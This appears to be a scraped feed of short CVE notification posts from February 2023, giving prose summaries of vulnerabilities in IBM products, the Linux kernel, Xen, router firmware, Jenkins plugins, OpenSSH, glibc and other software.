🚨 CVE-2019-4162IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, and 1.0.2 is missing the HTTP Strict Transport Security header. Users can navigate by mistake to the unencrypted version of the web application or accept invalid certificates. This leads to sensitive data being sent unencrypted over the wire. IBM X-Force ID: 158661.🎖@cveNotify |
|
| 2023-02-03 22:30:18 |
🚨 CVE-2019-4263IBM Content Navigator 3.0CD is vulnerable to local file inclusion, allowing an attacker to access a configuration file in the ICN server. IBM X-Force ID: 160015.🎖@cveNotify |
|
| 2023-02-03 22:30:16 |
🚨 CVE-2019-17341An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a page-writability race condition during addition of a passed-through PCI device.🎖@cveNotify |
|
| 2023-02-03 22:30:15 |
🚨 CVE-2019-17350An issue was discovered in Xen through 4.12.x allowing Arm domU attackers to cause a denial of service (infinite loop) involving a compare-and-exchange operation.🎖@cveNotify |
|
| 2023-02-03 22:30:13 |
🚨 CVE-2019-17342An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging a race condition that arose when XENMEM_exchange was introduced.🎖@cveNotify |
|
| 2023-02-03 22:30:12 |
🚨 CVE-2019-4260IBM Daeja ViewONE Professional, Standard & Virtual 5.0 through 5.0.5 could allow an unauthorized user to download server files resulting in sensitive information disclosure. IBM X-Force ID: 160012.🎖@cveNotify |
|
| 2023-02-03 22:30:10 |
🚨 CVE-2019-4140IBM Tivoli Storage Manager Server (IBM Spectrum Protect 7.1 and 8.1) could allow a local user to replace existing databases by restoring old data. IBM X-Force ID: 158336.🎖@cveNotify |
|
| 2023-02-03 22:30:09 |
🚨 CVE-2019-4296IBM Robotic Process Automation with Automation Anywhere 11 information disclosure could allow a local user to obtain e-mail contents from the client debug log file. IBM X-Force ID: 160759.🎖@cveNotify |
|
| 2023-02-03 22:30:08 |
🚨 CVE-2019-4252IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 159883.🎖@cveNotify |
|
| 2023-02-03 22:30:06 |
🚨 CVE-2019-4269IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 Admin Console could allow a remote attacker to obtain sensitive information when a specially crafted url causes a stack trace to be dumped. IBM X-Force ID: 160202.🎖@cveNotify |
|
| 2023-02-03 22:30:05 |
🚨 CVE-2019-4295IBM Robotic Process Automation with Automation Anywhere 11 could allow an attacker with specialized access to obtain highly sensitive from the credential vault. IBM X-Force ID: 160758.🎖@cveNotify |
|
| 2023-02-03 22:30:04 |
🚨 CVE-2019-4250IBM Jazz Foundation products (IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 159648.🎖@cveNotify |
|
| 2023-02-03 22:30:02 |
🚨 CVE-2019-4157IBM Security Access Manager 9.0.1 through 9.0.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 158573.🎖@cveNotify |
|
| 2023-02-03 22:30:01 |
🚨 CVE-2019-4156IBM Security Access Manager 9.0.1 through 9.0.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 158572.🎖@cveNotify |
|
| 2023-02-03 22:30:00 |
🚨 CVE-2022-42703mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.🎖@cveNotify |
|
| 2023-02-03 22:29:59 |
🚨 CVE-2019-4153IBM Security Access Manager 9.0.1 through 9.0.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 158517.🎖@cveNotify |
|
| 2023-02-03 22:29:58 |
🚨 CVE-2019-4152IBM Security Access Manager 9.0.1 through 9.0.6 does not invalidate session tokens in a timely manner. The lack of proper session expiration may allow attackers with local access to login into a closed browser session. IBM X-Force ID: 158515.🎖@cveNotify |
|
| 2023-02-03 22:29:57 |
🚨 CVE-2019-7630An issue was discovered in gdrv.sys in Gigabyte APP Center before 19.0227.1. The vulnerable driver exposes a wrmsr instruction via IOCTL 0xC3502580 and does not properly filter the target Model Specific Register (MSR). Allowing arbitrary MSR writes can lead to Ring-0 code execution and escalation of privileges.🎖@cveNotify |
|
| 2023-02-03 22:29:55 |
🚨 CVE-2020-1747A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.🎖@cveNotify |
|
| 2023-02-03 20:30:25 |
🚨 CVE-2020-36403HTSlib through 1.10.2 allows out-of-bounds write access in vcf_parse_format (called from vcf_parse and vcf_read).🎖@cveNotify |
|
| 2023-02-03 20:30:23 |
🚨 CVE-2019-4062IBM i2 Intelligent Analyis Platform 9.0.0 through 9.1.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 157007.🎖@cveNotify |
|
| 2023-02-03 20:30:21 |
🚨 CVE-2020-26664A vulnerability in EbmlTypeDispatcher::send in VideoLAN VLC media player 3.0.11 allows attackers to trigger a heap-based buffer overflow via a crafted .mkv file.🎖@cveNotify |
|
| 2023-02-03 20:30:20 |
🚨 CVE-2018-3861A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution.🎖@cveNotify |
|
| 2023-02-03 20:30:18 |
🚨 CVE-2019-4103IBM Tivoli Netcool/Impact 7.1.0 allows for remote execution of command by low privileged User. Remote code execution allow to execute arbitrary code on system which lead to take control over the system. IBM X-Force ID: 158094.🎖@cveNotify |
|
| 2023-02-03 20:30:17 |
🚨 CVE-2018-3836An exploitable command injection vulnerability exists in the gplotMakeOutput function of Leptonica 1.74.4. A specially crafted gplot rootname argument can cause a command injection resulting in arbitrary code execution. An attacker can provide a malicious path as input to an application that passes attacker data to this function to trigger this vulnerability.🎖@cveNotify |
|
| 2023-02-03 20:30:14 |
🚨 CVE-2019-4070IBM Intelligent Operations Center (IOC) 5.1.0 through 5.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 157015.🎖@cveNotify |
|
| 2023-02-03 20:30:11 |
🚨 CVE-2020-29394A buffer overflow in the dlt_filter_load function in dlt_common.c from dlt-daemon through 2.18.5 (GENIVI Diagnostic Log and Trace) allows arbitrary code execution because fscanf is misused (no limit on the number of characters to be read in the format argument).🎖@cveNotify |
|
| 2023-02-03 20:30:09 |
🚨 CVE-2020-8003A double-free vulnerability in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service by triggering texture allocation failure, because vrend_renderer_resource_allocated_texture is not an appropriate place for a free.🎖@cveNotify |
|
| 2023-02-03 20:30:06 |
🚨 CVE-2019-18390An out-of-bounds read in the vrend_blit_need_swizzle function in vrend_renderer.c in virglrenderer through 0.8.0 allows guest OS users to cause a denial of service via VIRGL_CCMD_BLIT commands.🎖@cveNotify |
|
| 2023-02-03 20:30:04 |
🚨 CVE-2020-8002A NULL pointer dereference in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service via commands that attempt to launch a grid without previously providing a Compute Shader (CS).🎖@cveNotify |
|
| 2023-02-03 20:30:00 |
🚨 CVE-2018-3834An exploitable permanent denial of service vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the kind of firmware image that is going to be installed and thus allows for flashing any signed firmware into any MCU. Since the device contains different and incompatible MCUs, flashing one firmware to the wrong MCU will result in a permanent brick condition. To trigger this vulnerability, an attacker needs to impersonate the remote server "cache.insteon.com" and serve a signed firmware image.🎖@cveNotify |
|
| 2023-02-03 20:29:57 |
🚨 CVE-2018-3835An exploitable out of bounds write vulnerability exists in version 2.2 of the Per Face Texture mapping application known as PTEX. The vulnerability is present in the reading of a file without proper parameter checking. The value read in, is not verified to be valid and its use can lead to a buffer overflow, potentially resulting in code execution.🎖@cveNotify |
|
| 2023-02-03 20:29:54 |
🚨 CVE-2019-6648On version 1.9.0, If DEBUG logging is enable, F5 Container Ingress Service (CIS) for Kubernetes and Red Hat OpenShift (k8s-bigip-ctlr) log files may contain BIG-IP secrets such as SSL Private Keys and Private key Passphrases as provided as inputs by an AS3 Declaration.🎖@cveNotify |
|
| 2023-02-03 20:29:52 |
🚨 CVE-2019-6643On versions 14.1.0-14.1.0.5, 14.0.0-14.0.0.4, 13.0.0-13.1.2, 12.1.0-12.1.4.1, and 11.5.2-11.6.4, an attacker sending specifically crafted DHCPv6 requests through a BIG-IP virtual server configured with a DHCPv6 profile may be able to cause the TMM process to produce a core file.🎖@cveNotify |
|
| 2023-02-03 20:29:49 |
🚨 CVE-2018-3833An exploitable firmware downgrade vulnerability exists in Insteon Hub running firmware version 1013. The firmware upgrade functionality, triggered via PubNub, retrieves signed firmware binaries using plain HTTP requests. The device doesn't check the firmware version that is going to be installed and thus allows for flashing older firmware images. To trigger this vulnerability, an attacker needs to impersonate the remote server 'cache.insteon.com' and serve any signed firmware image.🎖@cveNotify |
|
| 2023-02-03 20:29:46 |
🚨 CVE-2018-3832An exploitable firmware update vulnerability exists in Insteon Hub running firmware version 1013. The HTTP server allows for uploading arbitrary MPFS binaries that could be modified to enable access to hidden resources which allow for uploading unsigned firmware images to the device. To trigger this vulnerability, an attacker can upload an MPFS binary via the '/mpfsupload' HTTP form and later on upload the firmware via a POST request to 'firmware.htm'.🎖@cveNotify |
|
| 2023-02-03 20:29:44 |
🚨 CVE-2019-6645On BIG-IP 14.0.0-14.1.0.5, 13.0.0-13.1.2, 12.1.0-12.1.4.1, 11.5.2-11.6.4, FTP traffic passing through a Virtual Server with both an active FTP profile associated and connection mirroring configured may lead to a TMM crash causing the configured HA action to be taken.🎖@cveNotify |
|
| 2023-02-03 20:29:42 |
🚨 CVE-2023-22975jfinal_cms 5.1.0 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-02-03 20:29:40 |
🚨 CVE-2021-36432SQL injection vulnerability in jocms 0.8 allows remote attackers to run arbitrary SQL commands and view sentivie information via jo_set_mask() function in jocms/apps/mask/mask.php.🎖@cveNotify |
|
| 2023-02-03 18:29:51 |
🚨 CVE-2022-40985Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the '(ddns1|ddns2) hostname WORD' command template.🎖@cveNotify |
|
| 2023-02-03 18:29:50 |
🚨 CVE-2022-40987Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the '(ddns1|ddns2) username WORD password CODE' command template.🎖@cveNotify |
|
| 2023-02-03 18:29:46 |
🚨 CVE-2022-40986Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer overflow is in the function that manages the '(ddns1|ddns2) mx WORD' command template.🎖@cveNotify |
|
| 2023-02-03 18:29:45 |
🚨 CVE-2020-16118In GNOME Balsa before 2.6.0, a malicious server operator or man in the middle can trigger a NULL pointer dereference and client crash by sending a PREAUTH response to imap_mbox_connect in libbalsa/imap/imap-handle.c.🎖@cveNotify |
|
| 2023-02-03 18:29:44 |
🚨 CVE-2022-34138Insecure direct object references (IDOR) in the web server of Biltema IP and Baby Camera Software v124 allows attackers to access sensitive information.🎖@cveNotify |
|
| 2023-02-03 18:29:43 |
🚨 CVE-2023-24138TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function.🎖@cveNotify |
|
| 2023-02-03 18:29:39 |
🚨 CVE-2023-24139TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.🎖@cveNotify |
|
| 2023-02-03 18:29:38 |
🚨 CVE-2023-24141TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the setNetworkDiag function.🎖@cveNotify |
|
| 2023-02-03 18:29:37 |
🚨 CVE-2023-24142TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the setNetworkDiag function.🎖@cveNotify |
|
| 2023-02-03 18:29:36 |
🚨 CVE-2023-24143TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.🎖@cveNotify |
|
| 2023-02-03 15:30:27 |
🚨 CVE-2022-4087A vulnerability was found in iPXE. It has been declared as problematic. This vulnerability affects the function tls_new_ciphertext of the file src/net/tls.c of the component TLS. The manipulation of the argument pad_len leads to information exposure through discrepancy. The name of the patch is 186306d6199096b7a7c4b4574d4be8cdb8426729. It is recommended to apply a patch to fix this issue. VDB-214054 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-03 15:30:25 |
🚨 CVE-2023-24426Jenkins Azure AD Plugin 303.va_91ef20ee49f and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-02-03 15:30:23 |
🚨 CVE-2023-24425Jenkins Kubernetes Credentials Provider Plugin 1.208.v128ee9800c04 and earlier does not set the appropriate context for Kubernetes credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Kubernetes credentials they are not entitled to.🎖@cveNotify |
|
| 2023-02-03 15:30:21 |
🚨 CVE-2020-15803Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1 allows stored XSS in the URL Widget.🎖@cveNotify |
|
| 2023-02-03 15:30:19 |
🚨 CVE-2019-7307Apport before versions 2.14.1-0ubuntu3.29+esm1, 2.20.1-0ubuntu2.19, 2.20.9-0ubuntu7.7, 2.20.10-0ubuntu27.1, 2.20.11-0ubuntu5 contained a TOCTTOU vulnerability when reading the users ~/.apport-ignore.xml file, which allows a local attacker to replace this file with a symlink to any other file on the system and so cause Apport to include the contents of this other file in the resulting crash report. The crash report could then be read by that user either by causing it to be uploaded and reported to Launchpad, or by leveraging some other vulnerability to read the resulting crash report, and so allow the user to read arbitrary files on the system.🎖@cveNotify |
|
| 2023-02-03 15:30:17 |
🚨 CVE-2019-4210IBM QRadar SIEM 7.3.2 could allow a user to bypass authentication exposing certain functionality which could lead to information disclosure or modification of application configuration. IBM X-Force ID: 158986.🎖@cveNotify |
|
| 2023-02-03 15:30:14 |
🚨 CVE-2021-21781An information disclosure vulnerability exists in the ARM SIGPAGE functionality of Linux Kernel v5.4.66 and v5.4.54. The latest version (5.11-rc4) seems to still be vulnerable. A userland application can read the contents of the sigpage, which can leak kernel memory contents. An attacker can read a process’s memory at a specific offset to trigger this vulnerability. This was fixed in kernel releases: 4.14.222 4.19.177 5.4.99 5.10.17 5.11🎖@cveNotify |
|
| 2023-02-03 15:30:12 |
🚨 CVE-2019-7003A SQL injection vulnerability in the reporting component of Avaya Control Manager could allow an unauthenticated attacker to execute arbitrary SQL commands and retrieve sensitive data related to other users on the system. Affected versions of Avaya Control Manager include 7.x and 8.0.x versions prior to 8.0.4.0. Unsupported versions not listed here were not evaluated.🎖@cveNotify |
|
| 2023-02-03 15:30:10 |
🚨 CVE-2019-10163A Vulnerability has been found in PowerDNS Authoritative Server before versions 4.1.9, 4.0.8 allowing a remote, authorized master server to cause a high CPU load or even prevent any further updates to any slave zone by sending a large number of NOTIFY messages. Note that only servers configured as slaves are affected by this issue.🎖@cveNotify |
|
| 2023-02-03 15:30:08 |
🚨 CVE-2019-10129A vulnerability was found in postgresql versions 11.x prior to 11.3. Using a purpose-crafted insert to a partitioned table, an attacker can read arbitrary bytes of server memory. In the default configuration, any user can create a partitioned table suitable for this attack. (Exploit prerequisites are the same as for CVE-2018-1052).🎖@cveNotify |
|
| 2023-02-03 15:30:05 |
🚨 CVE-2018-16869A Bleichenbacher type side-channel based padding oracle attack was found in the way nettle handles endian conversion of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process, could use this flaw extract plaintext or in some cases downgrade any TLS connections to a vulnerable server.🎖@cveNotify |
|
| 2023-02-03 15:30:03 |
🚨 CVE-2023-0493Improper Neutralization of Equivalent Special Elements in GitHub repository btcpayserver/btcpayserver prior to 1.7.5.🎖@cveNotify |
|
| 2023-02-03 15:30:01 |
🚨 CVE-2018-14622A null-pointer dereference vulnerability was found in libtirpc before version 0.3.3-rc3. The return value of makefd_xprt() was not checked in all instances, which could lead to a crash when the server exhausted the maximum number of available file descriptors. A remote attacker could cause an rpc-based application to crash by flooding it with new connections.🎖@cveNotify |
|
| 2023-02-03 15:29:58 |
🚨 CVE-2021-24467The Leaflet Map WordPress plugin before 3.0.0 does not verify the CSRF nonce when saving its settings, which allows attackers to make a logged in admin update the settings via a Cross-Site Request Forgery attack. This could lead to Cross-Site Scripting issues by either changing the URL of the JavaScript library being used, or using malicious attributions which will be executed in all page with an embed map from the plugin🎖@cveNotify |
|
| 2023-02-03 15:29:56 |
🚨 CVE-2022-46967An access control issue in Revenue Collection System v1.0 allows unauthenticated attackers to view the contents of /admin/DBbackup/ directory.🎖@cveNotify |
|
| 2023-02-03 15:29:54 |
🚨 CVE-2019-4239IBM MQ Advanced Cloud Pak (IBM Cloud Private 1.0.0 through 3.0.1) stores user credentials in plain in clear text which can be read by a local user. IBM X-Force ID: 159465.🎖@cveNotify |
|
| 2023-02-03 15:29:51 |
🚨 CVE-2022-46966Revenue Collection System v1.0 was discovered to contain a SQL injection vulnerability at step1.php.🎖@cveNotify |
|
| 2023-02-03 15:29:50 |
🚨 CVE-2023-24424Jenkins OpenId Connect Authentication Plugin 2.4 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-02-03 15:29:46 |
🚨 CVE-2023-24423A cross-site request forgery (CSRF) vulnerability in Jenkins Gerrit Trigger Plugin 2.38.0 and earlier allows attackers to rebuild previous builds triggered by Gerrit.🎖@cveNotify |
|
| 2023-02-03 15:29:43 |
🚨 CVE-2019-4219IBM Security Information Queue (ISIQ) 1.0.0, 1.0.1, and 1.0.2 generates an error message that includes sensitive information that could be used in further attacks against the system. IBM X-Force ID: 159228.🎖@cveNotify |
|
| 2023-02-03 13:30:11 |
🚨 CVE-2023-0549A vulnerability, which was classified as problematic, has been found in YAFNET up to 3.1.10. This issue affects some unknown processing of the file /forum/PostPrivateMessage of the component Private Message Handler. The manipulation of the argument subject/message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.11 is able to address this issue. The name of the patch is 2237a9d552e258a43570bb478a92a5505e7c8797. It is recommended to upgrade the affected component. The identifier VDB-219665 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-03 12:30:48 |
🚨 CVE-2022-2601A buffer overflow was found in grub_font_construct_glyph(). A malicious crafted pf2 font can lead to an overflow when calculating the max_glyph_size value, allocating a smaller than needed buffer for the glyph, this further leads to a buffer overflow and a heap based out-of-bounds write. An attacker may use this vulnerability to circumvent the secure boot mechanism.🎖@cveNotify |
|
| 2023-02-03 12:30:46 |
🚨 CVE-2022-46908SQLite through 3.40.0, when relying on --safe for execution of an untrusted CLI script, does not properly implement the azProhibitedFunctions protection mechanism, and instead allows UDF functions such as WRITEFILE.🎖@cveNotify |
|
| 2023-02-03 12:30:45 |
🚨 CVE-2022-4293Floating Point Comparison with Incorrect Operator in GitHub repository vim/vim prior to 9.0.0804.🎖@cveNotify |
|
| 2023-02-03 12:30:43 |
🚨 CVE-2022-3570Multiple heap buffer overflows in tiffcrop.c utility in libtiff library Version 4.4.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact🎖@cveNotify |
|
| 2023-02-03 12:30:41 |
🚨 CVE-2022-42720Various refcounting bugs in the multi-BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to trigger use-after-free conditions to potentially execute code.🎖@cveNotify |
|
| 2023-02-03 12:30:39 |
🚨 CVE-2022-42721A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code.🎖@cveNotify |
|
| 2023-02-03 12:30:38 |
🚨 CVE-2022-42722In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices.🎖@cveNotify |
|
| 2023-02-03 12:30:37 |
🚨 CVE-2022-42719A use-after-free in the mac80211 stack when parsing a multi-BSSID element in the Linux kernel 5.2 through 5.19.x before 5.19.16 could be used by attackers (able to inject WLAN frames) to crash the kernel and potentially execute code.🎖@cveNotify |
|
| 2023-02-03 12:30:35 |
🚨 CVE-2022-2327io_uring use work_flags to determine which identity need to grab from the calling process to make sure it is consistent with the calling process when executing IORING_OP. Some operations are missing some types, which can lead to incorrect reference counts which can then lead to a double free. We recommend upgrading the kernel past commit df3f3bb5059d20ef094d6b2f0256c4bf4127a859🎖@cveNotify |
|
| 2023-02-03 12:30:33 |
🚨 CVE-2023-23126** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions. NOTE: the vendor's position is that a Content-Security-Policy HTTP response header is present to block this attack.🎖@cveNotify |
|
| 2023-02-03 12:30:32 |
🚨 CVE-2023-23130** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled. OTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting.🎖@cveNotify |
|
| 2023-02-03 12:30:30 |
🚨 CVE-2022-48074An issue in NoMachine before v8.2.3 allows attackers to execute arbitrary commands via a crafted .nxs file.🎖@cveNotify |
|
| 2023-02-03 12:30:29 |
🚨 CVE-2023-25136OpenSSH server (sshd) 9.1 introduced a double-free vulnerability during options.kex_algorithms handling. This is fixed in OpenSSH 9.2. The double free can be triggered by an unauthenticated attacker in the default configuration; however, the vulnerability discoverer reports that "exploiting this vulnerability will not be easy."🎖@cveNotify |
|
| 2023-02-03 12:30:28 |
🚨 CVE-2023-25139sprintf in the GNU C Library (glibc) 2.37 has a buffer overflow (out-of-bounds write) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.🎖@cveNotify |
|
| 2023-02-03 07:30:04 |
🚨 CVE-2018-1048It was found that the AJP connector in undertow, as shipped in Jboss EAP 7.1.0.GA, does not use the ALLOW_ENCODED_SLASH option and thus allow the the slash / anti-slash characters encoded in the url which may lead to path traversal and result in the information disclosure of arbitrary local files.🎖@cveNotify |
|
| 2023-02-03 07:30:03 |
🚨 CVE-2023-24613The user interface of Array Networks AG Series and vxAG through 9.4.0.470 could allow a remote attacker to use the gdb tool to overwrite the backend function call stack after accessing the system with administrator privileges. A successful exploit could leverage this vulnerability in the backend binary file that handles the user interface to a cause denial of service attack. This is fixed in AG 9.4.0.481.🎖@cveNotify |
|
| 2023-02-03 07:30:02 |
🚨 CVE-2018-16879Ansible Tower before version 3.3.3 does not set a secure channel as it is using the default insecure configuration channel settings for messaging celery workers from RabbitMQ. This could lead in data leak of sensitive information such as passwords as well as denial of service attacks by deleting projects or inventory files.🎖@cveNotify |
|
| 2023-02-03 07:30:01 |
🚨 CVE-2017-15139A vulnerability was found in openstack-cinder releases up to and including Queens, allowing newly created volumes in certain storage volume configurations to contain previous data. It specifically affects ScaleIO volumes using thin volumes and zero padding. This could lead to leakage of sensitive information between tenants.🎖@cveNotify |
|
| 2023-02-03 07:30:00 |
🚨 CVE-2018-0388A vulnerability in the web-based interface of Cisco Wireless LAN Controller (WLC) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web-based interface of an affected system. The vulnerability is due to insufficient validation of user-supplied input by the web-based interface. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information.🎖@cveNotify |
|
| 2023-02-03 02:29:48 |
🚨 CVE-2022-22486IBM Tivoli Workload Scheduler 9.4, 9.5, and 10.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 226328.🎖@cveNotify |
|
| 2023-02-03 02:29:47 |
🚨 CVE-2022-38389IBM Tivoli Workload Scheduler 9.4, 9.5, and 10.1 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 233975.🎖@cveNotify |
|
| 2023-02-03 02:29:46 |
🚨 CVE-2023-0658A vulnerability, which was classified as critical, was found in Multilaser RE057 and RE170 2.1/2.2. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-220053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-03 02:29:45 |
🚨 CVE-2023-23110An exploitable firmware modification vulnerability was discovered in certain Netgear products. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can conduct a MITM attack to modify the user-uploaded firmware image and bypass the checksum verification. This affects WNR612v2 Wireless Routers 1.0.0.3 and earlier, DGN1000v3 Modem Router 1.0.0.22 and earlier, D6100 WiFi DSL Modem Routers 1.0.0.63 and earlier, WNR1000v2 Wireless Routers 1.1.2.60 and earlier, XAVN2001v2 Wireless-N Extenders 0.4.0.7 and earlier, WNR2200 Wireless Routers 1.0.1.102 and earlier, WNR2500 Wireless Routers 1.0.0.34 and earlier, R8900 Smart WiFi Routers 1.0.3.6 and earlier, and R9000 Smart WiFi Routers 1.0.3.6 and earlier.🎖@cveNotify |
|
| 2023-02-03 02:29:43 |
🚨 CVE-2022-46835IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentityIQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentityIQ 8.1 and all 8.1 patch levels prior to 8.1p7, Identity|Q 8.0 and all 8.0 patch levels prior to 8.0p6 allow access to arbitrary files in the application server filesystem due to a path traversal vulnerability in JavaServer Faces (JSF) 2.2.20 documented in CVE-2020-6950.🎖@cveNotify |
|
| 2023-02-03 02:29:42 |
🚨 CVE-2023-0634An uncontrolled process operation was found in the newgrp command provided by the shadow-utils package. This issue could cause the execution of arbitrary code provided by a user when running the newgrp command.🎖@cveNotify |
|
| 2023-02-02 22:30:07 |
🚨 CVE-2022-26500Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code.🎖@cveNotify |
|
| 2023-02-02 22:30:06 |
🚨 CVE-2023-23110An exploitable firmware modification vulnerability was discovered in certain Netgear products. The data integrity of the uploaded firmware image is ensured with a fixed checksum number. Therefore, an attacker can conduct a MITM attack to modify the user-uploaded firmware image and bypass the checksum verification. This affects WNR612v2 Wireless Routers 1.0.0.3 and earlier, DGN1000v3 Modem Router 1.0.0.22 and earlier, D6100 WiFi DSL Modem Routers 1.0.0.63 and earlier, WNR1000v2 Wireless Routers 1.1.2.60 and earlier, XAVN2001v2 Wireless-N Extenders 0.4.0.7 and earlier, WNR2200 Wireless Routers 1.0.1.102 and earlier, WNR2500 Wireless Routers 1.0.0.34 and earlier, R8900 Smart WiFi Routers 1.0.3.6 and earlier, and R9000 Smart WiFi Routers 1.0.3.6 and earlier.🎖@cveNotify |
|
| 2023-02-02 22:30:05 |
🚨 CVE-2018-3860An exploitable out-of-bounds write exists in the TIFF parsing functionality of Canvas Draw version 4.0.0. A specially crafted TIFF image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a TIFF image to trigger this vulnerability and gain the ability to execute code. A different vulnerability than CVE-2018-3859.🎖@cveNotify |
|
| 2023-02-02 22:30:04 |
🚨 CVE-2018-3870An exploitable out-of-bounds write exists in the PCX parsing functionality of Canvas Draw version 4.0.0. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code execution. A different vulnerability than CVE-2018-3871.🎖@cveNotify |
|
| 2023-02-02 22:30:03 |
